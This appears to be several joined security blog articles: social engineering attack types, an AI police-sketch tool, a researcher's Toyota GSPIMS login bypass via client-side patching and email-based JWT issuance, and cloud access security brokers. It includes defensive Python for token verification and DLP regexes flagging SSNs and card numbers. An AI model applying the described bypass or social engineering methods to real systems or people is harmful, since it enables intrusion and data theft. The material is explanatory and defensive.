Address vulnerabilities before exploitation: Comprehensive testing can help organizations identify and remediate security vulnerabilities before they can be exploited. This can reduce the risk of a successful attack and improve the overall security posture of the application.
Ensure the security of the entire application: Testing individual components may not be enough to ensure the security of the entire application. By testing everything, organizations can understand how all components and interactions work together and identify potential security vulnerabilities in the overall architecture.
Periodically Update Your Map
Periodically updating your application map is a best practice that helps ensure the security of an application. Regularly updating the map ensures that it remains accurate and up-to-date, which is essential for effective security management. Here are a few reasons why periodic updates are important:
Reflect changes in the application: Applications change over time, and regular updates to the map help ensure that these changes are accurately reflected. For example, new components may be added, existing components may be updated, or relationships between components may change. Keeping the map up-to-date helps organizations understand the impact of these changes on the security of the application.
Identify new dependencies: As the application evolves, new dependencies may be introduced that need to be recognized and managed. By regularly updating the map, organizations can identify these new dependencies and understand how they impact the security of the application.
Stay ahead of threats: Threats to the security of an application are constantly changing, and regular updates to the map help organizations stay ahead of these threats. By understanding how changes in the application and new threats may impact the security of the application, organizations can take proactive steps to mitigate risk.
Improve security management: Periodic updates to the application map can help organizations improve the efficiency and effectiveness of security management. By keeping the map up-to-date, organizations can ensure that security efforts are focused on the right areas and that the overall security posture of the application is strong.
Conclusion
In conclusion, application mapping is a powerful tool that can significantly boost the security of applications. By creating a detailed map of the components and interactions within an application, organizations can gain a better understanding of their security posture and identify potential vulnerabilities.
By following the best practices in this article, organizations can proactively mitigate risk and improve the efficiency and effectiveness of their security management efforts. In today’s increasingly connected and complex technological landscape, the importance of application security cannot be overstated, and application mapping can play a critical role in ensuring the security and protection of sensitive information and data.
Social Engineering is a technique used by cybercriminals to exploit human weaknesses. The act of Social Engineering involves various techniques, all of which rely on the manipulation of human psychology.
Threat actors rely especially on Social Engineering in order to gain sensitive information from victims easily. A social engineering attack depends on building trust with the victim so that they never suspect anything when giving out personal information such as phone numbers, passwords, social security numbers, etc.
This technique has proved to be the most successful one when it comes to breaking into an organization’s network. Hackers can disguise themselves as an IT auditor or an external network administrator and easily gain access to a building without suspicion. Once they are inside an organization, they follow various other social engineering techniques to compromise its network.
One of the greatest weaknesses an organization can have is a lack of information security knowledge among its employees. This lack of cybersecurity knowledge gives hackers a great advantage in performing attacks that cause data breaches in the organization.
Social Engineering Attack Types
There are many social engineering attacks that can be used by threat actors. Some of them are:
1. Phishing
2. Vishing
3. Spoofing
4. Tailgating
5. Quid pro quo
6. Baiting
1. Phishing
Phishing is the simplest and most effective attack a hacker can use to steal credentials such as usernames, passwords, social security numbers, organization secrets, or credit card details. Sometimes phishing is also used to spread malware inside a network. In general, phishing involves social engineering as well as spoofing.
2. Vishing
Vishing is similar to phishing but involves calling the victim and pretending to be a legitimate caller. Once the victim believes the caller without suspicion, it is easy for the hacker to gain sensitive information such as the network structure, employee details, company account details, etc.
3. Spoofing
Spoofing is a type of attack where “what we see looks like the real thing, but it is not”. In terms of cyber security, spoofing is nothing but disguising oneself as a legitimate source in order to gain sensitive information or to gain access to something. An attacker can trick us into believing that he is from the original source by spoofing.
4. Tailgating
Tailgating or piggybacking is a technique used by threat actors to enter an organization’s building. During this attack, the threat actors wait for an employee or another person to enter a place where access for outsiders is restricted, and follow them inside the building once they have used their access card or key to open the door.
5. Quid pro quo
Quid pro quo is Latin for “a favor for a favor”. In this case, the hacker communicates with an employee of a company and offers them a deal: either money in exchange for information, or anything else the employee might wish for.
In most cases, money is the main motive. Hackers communicate with a current employee or an ex-employee and ask them to give away sensitive information such as administrator privileges, an administrator password, the network structure, or any other data they require, in exchange for the employee’s wish.
Hackers convince the employees to give away the information by making a personal deal with them. This is considered one of the most serious threats to an organization because the information is given away intentionally by an employee.
6. Baiting
As the word describes, hackers create baits such as USB flash drives, CD-ROMs, floppy disks or card readers.
They create folders on the devices with names such as Projects or Revised Payrolls of the organization and drop them in areas (elevators, rest rooms, cafeterias or parking lots) where employees are likely to find them.
Once an employee picks up the device and inserts it into their computer, the script inside runs and gives the hackers full control. This method of Social Engineering is called Baiting.
Police forensics is already plagued by human biases. Experts say AI will make it even worse.
Two developers have used OpenAI’s DALL-E 2 image generation model to create a forensic sketch program that can create “hyper-realistic” police sketches of a suspect based on user inputs.
The program, called Forensic Sketch AI-rtist, was created by developers Artur Fortunato and Filipe Reynaud as part of a hackathon in December 2022. The developers wrote that the program’s purpose is to cut down the time it usually takes to draw a suspect of a crime, which is “around two to three hours,” according to a presentation uploaded to the internet.
“We haven’t released the product yet, so we don’t have any active users at the moment,” Fortunato and Reynaud told Motherboard in a joint email. “At this stage, we are still trying to validate if this project would be viable to use in a real world scenario or not. For this, we’re planning on reaching out to police departments in order to have input data that we can test this on.”
AI ethicists and researchers told Motherboard that the use of generative AI in police forensics is incredibly dangerous, with the potential to worsen existing racial and gender biases that appear in initial witness descriptions.
“The problem with traditional forensic sketches is not that they take time to produce (which seems to be the only problem that this AI forensic sketch program is trying to solve). The problem is that any forensic sketch is already subject to human biases and the frailty of human memory,” Jennifer Lynch, the Surveillance Litigation Director of the Electronic Frontier Foundation, told Motherboard. “AI can’t fix those human problems, and this particular program will likely make them worse through its very design.”
The program asks users to provide information either through a template that asks for gender, skin color, eyebrows, nose, beard, age, hair, eyes, and jaw descriptions or through the open description feature, in which users can type any description they have of the suspect. Then, users can click “generate profile,” which sends the descriptions to DALL-E 2 and produces an AI-generated portrait.
The Global Supplier Preparation Information Management System, or GSPIMS, of Toyota, was breached by a security researcher using a backdoor. After 90 days, the hacker dutifully alerted the company about the breach.
The firm’s web platform, known as GSPIMS, enables employees and suppliers to remotely log in and manage the company’s extensive supply chain. It is an Angular single-page application. Based on a license key embedded in the app for AG Grid, it was created by SHI International Corp – USA on behalf of Toyota.
“I discovered what was essentially a backdoor login mechanism in the Toyota GSPIMS website/application that allowed me to log in as any corporate Toyota user or supplier just by knowing their email”, wrote a security specialist who blogs under the pseudonym EatonWorks.
He eventually found the email address of the system administrator and was able to access their account. He says “I had full control over the entire global system”.
Also, he had complete access to all internal Toyota projects, data, and user accounts, including those of Toyota’s partners and suppliers from outside the company.
On November 3, 2022, Toyota was properly informed of the issues, and by November 23, 2022, the firm had verified they had been resolved.
Specifics of the Toyota Breach
The researcher made the decision to investigate any potential threats concealed behind the login screen.
He had to modify the JavaScript code to get past the login screen. Here, developers control who has access to particular pages using Angular framework functions that return true or false.
Patching the Angular functions
The researcher explains that patching the JavaScript was all that was needed to achieve full access, since the API was improperly secured.
In GSPIMS’ case, no data would load from the API. All the endpoints would return HTTP status 401 – Unauthorized responses due to the missing login cookie.
“Toyota/SHI had seemingly secured their API correctly, and at this point, I was about to write this site off as “probably secure”. I don’t bother reporting single-page-application bypasses unless it also exposes a leaky/improperly secured API”, says the researcher.
Further, the analyst rapidly realized that the service was creating a JSON Web Token (JWT) based on the user’s email address for password-less login. Therefore, someone could create a valid JWT if they were able to guess a genuine email address of a Toyota employee.
“I had discovered a way to generate a valid JWT for any Toyota employee or supplier registered in GSPIMS, completely bypassing the various corporate login flows, which probably also enforce two-factor authentication options”, the researcher wrote.
Acquiring a valid JWT
While trying to locate a user with the System Admin role, the researcher came across another API endpoint called findByEmail that only required a valid email to return data on a user’s account. Conveniently, this also identifies the managers of the user.
This gave him access to the User Administration section. He poked around more and found users with even higher access, such as Supplier Admin, Global Admin, and finally, System Admin.
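The two weaknesses described above, a login flow that mints a JWT from an email address alone and an API whose user-lookup endpoint trusted the caller, are both closed on the server side. The following Python example is added here and is not Toyota’s, SHI’s or the researcher’s code: it gates token issuance behind a password check, verifies the token’s signature, algorithm and expiry with the standard library only, and implements a constructed findByEmail-style handler that enforces role checks itself rather than relying on the single-page application’s route guards. The user directory, roles, signing key and passwords are all constructed.

```python
import base64
import hashlib
import hmac
import json
import time

# Constructed demo secret and salt; a real deployment loads these from a secret store.
SIGNING_KEY = b"constructed-demo-signing-key"
SALT = b"constructed-demo-salt"


def _pw_hash(password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 100_000)


# Constructed user directory standing in for the application's user store.
USERS = {
    "alice@example.test": {"role": "Supplier", "manager": "bob@example.test",
                           "pw": _pw_hash("alice-pass")},
    "bob@example.test": {"role": "SupplierAdmin", "manager": "root@example.test",
                         "pw": _pw_hash("bob-pass")},
    "root@example.test": {"role": "SystemAdmin", "manager": None,
                          "pw": _pw_hash("root-pass")},
}


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_token(email: str, role: str, ttl: int = 900) -> str:
    """Mint an HS256 JWT. Only reachable after the caller has proved identity (see login)."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = _b64url(json.dumps({"sub": email, "role": role,
                                  "exp": int(time.time()) + ttl}).encode())
    signing_input = f"{header}.{payload}".encode()
    sig = hmac.new(SIGNING_KEY, signing_input, hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def login(email: str, password: str):
    """The only path to a token: knowing an email address is not enough."""
    user = USERS.get(email)
    if user is None or not hmac.compare_digest(user["pw"], _pw_hash(password)):
        return None
    return issue_token(email, user["role"])


def verify_token(token: str):
    """Return the claims if signature, algorithm and expiry check out, else None."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
        if header.get("alg") != "HS256":          # refuse algorithm substitution
            return None
        expected = hmac.new(SIGNING_KEY, f"{header_b64}.{payload_b64}".encode(),
                            hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
            return None
        claims = json.loads(_b64url_decode(payload_b64))
        if claims.get("exp", 0) <= int(time.time()):
            return None
        return claims
    except ValueError:  # malformed base64, JSON or token shape
        return None


def find_by_email(token: str, target_email: str):
    """Server-side lookup handler: authn and authz are enforced here, not in the SPA.
    Returns (http_status, record)."""
    claims = verify_token(token)
    if claims is None:
        return 401, None
    if claims["sub"] != target_email and claims["role"] != "SystemAdmin":
        return 403, None
    user = USERS.get(target_email)
    if user is None:
        return 404, None
    return 200, {"email": target_email, "role": user["role"], "manager": user["manager"]}
```

The handler answers 401 to anything without a valid token and 403 to a valid token that asks about someone else without the System Admin role, so patching the client-side page guards gains nothing, and a forged payload fails the signature check before any role is read.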
A GSPIMS system administrator has access to private data, including 14,000 user profiles, project schedules, supplier rankings, and classified documents.
Internal Toyota documents
The researcher said Toyota prevented what could have been a disastrous leak of information about its partners’ and suppliers’ employees as well. It would have been possible to make embarrassing internal remarks and supplier rankings public.
Because cyberattacks on Toyota and its suppliers have previously occurred, another one was quite likely.
A cloud access security broker is a security policy enforcement point that can be located on-premises or in the cloud. Its purpose is to aggregate and implement an enterprise’s security policies whenever cloud-based resources are accessed.
The cloud access security broker is analogous to a security guard in that it ensures compliance with the laws that were established by the administrators of the cloud service.
A cloud access security broker is a security solution that enables businesses to protect both their data and their users while they are working in the cloud. It functions as a middleman between an organization’s IT infrastructure and the company’s cloud services, monitoring and limiting access to ensure that security policies are adhered to.
Companies’ increasing use of cloud-based services is one of the primary factors driving the growing demand for cloud access security brokers. As more businesses move their data and applications to the cloud, which is simple to use and manage, they need a way to secure their assets and protect themselves against the threats that arise when services are connected to one another without a great deal of control over them.
Cloud access security brokers offer a means to monitor and regulate access to cloud services, thereby guaranteeing that only authorized users can view sensitive data.
Cloud Access Security Broker for Data Protection: How It Can Be Achieved
Cloud access security brokers can also assist enterprises in complying with regulations and industry standards such as HIPAA, PCI-DSS and SOC 2, among others. Furthermore, beyond detailed reporting on data breaches, they can perform data encryption and manage access controls, so that the business carries out these procedures effectively. As a result, a cloud access security broker can be used for cloud data security in a number of ways.
Using Cloud Access Security Brokers for Data Loss Prevention
Once implemented, cloud access security brokers can monitor the resources that have been created or deployed. They can also enforce access restrictions on those resources, which guarantees that only people authorized to access them can reach that sensitive data. This not only protects against unauthorized access but also prevents sensitive data from being accidentally deleted.
Performing Data Encryption
Cloud access security broker protects data in a variety of ways, including through the implementation of appropriate access restrictions. Cloud access security brokers have the ability to encrypt sensitive data while it is both at rest and in motion.
If the data is encrypted, then even if someone gains unauthorized access to it or the data itself is stolen, it cannot be read without the appropriate decryption keys. As a result, the data stays protected even after an unauthorized access has taken place.
Managing proper compliance
Because cloud access security brokers are responsible for the enforcement of a wide variety of policies, they can be of assistance in achieving various kinds of compliance. Cloud access security brokers are able to assist firms in meeting regulatory requirements and industry standards, such as HIPAA, PCI-DSS, and SOC 2, which may be applicable.
Cloud access security brokers are essentially reporting and alerting systems that give organizations information about potential security breaches. This enables organizations to take action to secure their data swiftly.
The Four Pillars of a Cloud Access Security Broker
Cloud access security brokers are built on four distinct pillars, each of which not only assists an organization in meeting appropriate data encryption standards but also provides a means by which the users of that organization can be protected. Cloud access security brokers offer visibility into the utilization of cloud services across an entire organization. This visibility includes information about which services are being utilized, who is using them, and the kind of data that is being saved or accessed. This offers an organization a sufficient level of visibility of its resources.
By providing extensive reporting and notifications on potential security breaches, cloud access security brokers are able to assist organizations in meeting regulatory obligations and industry standards.
The prevention of data loss, encryption, access restriction, and activity monitoring are only some of the security measures that can be enforced by cloud access security brokers in order to secure data and users in the cloud. In addition to this, they offer governance capabilities for their customers, such as policy management, incident response, and risk management, to assist businesses in managing and securing their cloud environments.
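To show how the data loss prevention, compliance reporting and threat protection pillars above fit together in one enforcement point, here is an added Python example that is not the code of any CASB product: a tiny policy engine that decides each cloud request against a sanctioned-service matrix, scans uploads and shares for sensitive data (with a Luhn check on card-number hits to reduce false positives), lets encrypted uploads of sensitive data through, records every decision in an audit list for visibility and reporting, and raises an alert when a user’s download count exceeds a threshold. The users, services, patterns and thresholds are constructed.

```python
import re
from dataclasses import dataclass


@dataclass
class Request:
    user: str
    service: str
    action: str                  # "upload", "download" or "share"
    content: bytes = b""
    encrypted: bool = False      # encrypted before it leaves the organisation
    external_recipient: bool = False


# Constructed sanctioned-service matrix: who may use which cloud service.
SANCTIONED = {"alice": {"crm", "drive"}, "bob": {"drive"}}

# Constructed DLP patterns: SSN-like and 16-digit card-number-like strings.
SSN_RE = re.compile(rb"\b\d{3}-\d{2}-\d{4}\b")
PAN_RE = re.compile(rb"\b(?:\d{4}[ -]?){3}\d{4}\b")


def luhn_ok(digits: str) -> bool:
    """Luhn checksum, so that arbitrary 16-digit numbers are not flagged as cards."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def classify(content: bytes) -> list:
    """Sensitive data classes found in the payload."""
    classes = []
    if SSN_RE.search(content):
        classes.append("ssn")
    for m in PAN_RE.finditer(content):
        if luhn_ok(re.sub(rb"\D", b"", m.group()).decode()):
            classes.append("pan")
            break
    return classes


def evaluate(req: Request, audit: list) -> tuple:
    """Policy enforcement point: decide, then record the event for visibility/reporting.
    Returns (decision, reason)."""
    classes = classify(req.content) if req.action in ("upload", "share") else []
    if req.service not in SANCTIONED.get(req.user, set()):
        decision = ("deny", "unsanctioned-service")
    elif classes and not req.encrypted:
        decision = ("deny", "dlp:" + ",".join(classes))
    elif req.action == "share" and req.external_recipient and classes:
        decision = ("deny", "external-share-of-sensitive")
    else:
        decision = ("allow", "policy-ok")
    audit.append({"user": req.user, "service": req.service, "action": req.action,
                  "classes": classes, "decision": decision[0], "reason": decision[1]})
    return decision


def alerts(audit: list, max_downloads: int) -> list:
    """Threat-protection pillar: users whose allowed downloads exceed a threshold."""
    counts = {}
    for ev in audit:
        if ev["action"] == "download" and ev["decision"] == "allow":
            counts[ev["user"]] = counts.get(ev["user"], 0) + 1
    return sorted(u for u, n in counts.items() if n > max_downloads)
```

The audit list is the visibility pillar in miniature: every record names the user, service, action, data classes and the decision, which is what a compliance report or an incident responder needs later, whether the request was allowed or not.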
Conclusion
Cloud access security brokers safeguard cloud data. They monitor and control data and application access to secure cloud services. By monitoring and controlling cloud usage, they assist enterprises to meet regulatory and industry standards.
Cloud access security brokers can identify and mitigate threats to prevent data breaches and other security problems. They also offer encryption, data loss prevention, and threat detection. These solutions benefit all businesses, especially cloud-dependent ones. They should be utilized with firewalls, intrusion detection systems, and antivirus software as part of a holistic security plan.